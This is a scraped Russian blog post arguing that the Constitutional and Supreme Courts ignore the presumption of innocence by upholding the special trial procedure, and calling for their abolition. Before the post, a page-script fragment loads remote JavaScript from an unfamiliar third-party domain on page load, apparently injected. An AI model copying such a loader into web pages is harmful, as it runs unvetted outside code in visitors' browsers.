, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Что делает Конституционный Суд РФ, если жизнь россиян Конституции не соответствует?

13 Окт

Напомню о некоторых полномочия Конституционного Суда РФ (КС).

В целях защиты основ конституционного строя, основных прав и свобод человека и гражданина, обеспечения верховенства и прямого действия Конституции Российской Федерации на всей территории Российской Федерации Конституционный Суд Российской Федерации: — разрешает дела о соответствии Конституции Российской Федерации; — разрешает споры о компетенции; — по жалобам на нарушение конституционных прав и свобод граждан проверяет конституционность закона, примененного в конкретном деле.

Следует признать, что в первые годы своего существования КС  проверял не только конституционность закона, применённого в конкретном деле, но и правоприменительную практику его применения в целом.

В решениях КС, признававшими неконституционным тот или иной закон, нередко, прямо указывалось: «и по смыслу, придаваемому ему сложившейся правоприменительной практикой».

Но в дальнейшем КС перестал давать оценку тому, какой смысл получила на практике та или иная норма.

Более того, рассматривая жалобы на нарушение конституционных прав и свобод граждан, КС закрывал глаза на то, что прописано в Основном Законе страны и иных федеральных законах.

Например, Конституция в статье 49 устанавливает, что каждый обвиняемый в совершении преступления считается не виновным, пока его виновность не будет доказана в предусмотренном федеральным законом порядке.

В федеральном законе, в статье 1 УПК РФ, прямо указывается, что установленный  порядок  уголовного судопроизводства  является обязательным для судов, органов прокуратуры, органов предварительного следствия и органов дознания.

При этом  в  части 2 статьи 77 УПК РФ предписывается: «Признание обвиняемым своей вины в совершении преступления может быть положено в основу обвинения лишь при подтверждении его виновности совокупностью имеющихся по уголовному делу доказательств».

А это значит, что во всех случаях судом должны исследоваться и проверяться доказательства, собранные по уголовному делу. Иная правоприменительная практика неправомерна.

В Конституции РФ, в статье 118, записано, что создание чрезвычайных судов не допускается, но про запрет на особый порядок судебного разбирательства никаких ограничений нет.

Вот, чего-то недоучившие «правоведы», игнорируя требования, по оценке показаний обвиняемого, посчитали, что если они внесут в закон раздел об особом порядке судебного разбирательства, то правоприменительная практика без оценки и исследования, собранных по делу доказательств,  станет правомерной.

Такой порядок уже существует в России более 15 лет.

Не исследуя собранные по делу доказательства, основываясь только на согласии обвиняемого с предъявленным ему обвинением, ежегодно в стране осуждают 500−700 тысяч подсудимых.

На жалобы, что поступают на такую неправомерную правоприменительную практику, КС отвечает: «статьи 314 — 317 УПК Российской Федерации не воспрепятствовали рассмотрению уголовного дела тем судом и в том порядке, которые установлены федеральным законом и были избраны самим обвиняемым».

Такое ощущение, что судьи  КС  много лет изолированы от СМИ и ничего не знают о пыточном судопроизводстве, которое заставляет подозреваемого брать на себя чужую вину, соглашаться с предъявленным ему обвинением в преступлении, которого он не совершал.

О точечных изменениях в Конституции уже заговорил  и Председатель КС В. Зорькин.

Огромные средства расходуются из казны на содержание судов, которые фактически устранились от защиты прав и свобод человека и гражданина.

Например, Верховный Суда РФ (ВС), как высшая судебная инстанция уже не рассматривает жалобы на решения, вынесенные по делам, где обвиняемый согласился с предъявленным обвинением. А таковых дел уже около 70%, что суды ежегодно рассматривают.

Фактически  КС и ВС не обеспечивают своего предназначения по установлению в стране правосудия, как вида государственной деятельности, осуществляемой с соблюдением особого порядка, закреплённого Конституцией и процессуальным законодательством.

В этой связи, мне представляется, что если и надо вносить изменения в Основной Закон  страны, то по ликвидации КС и ВС.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.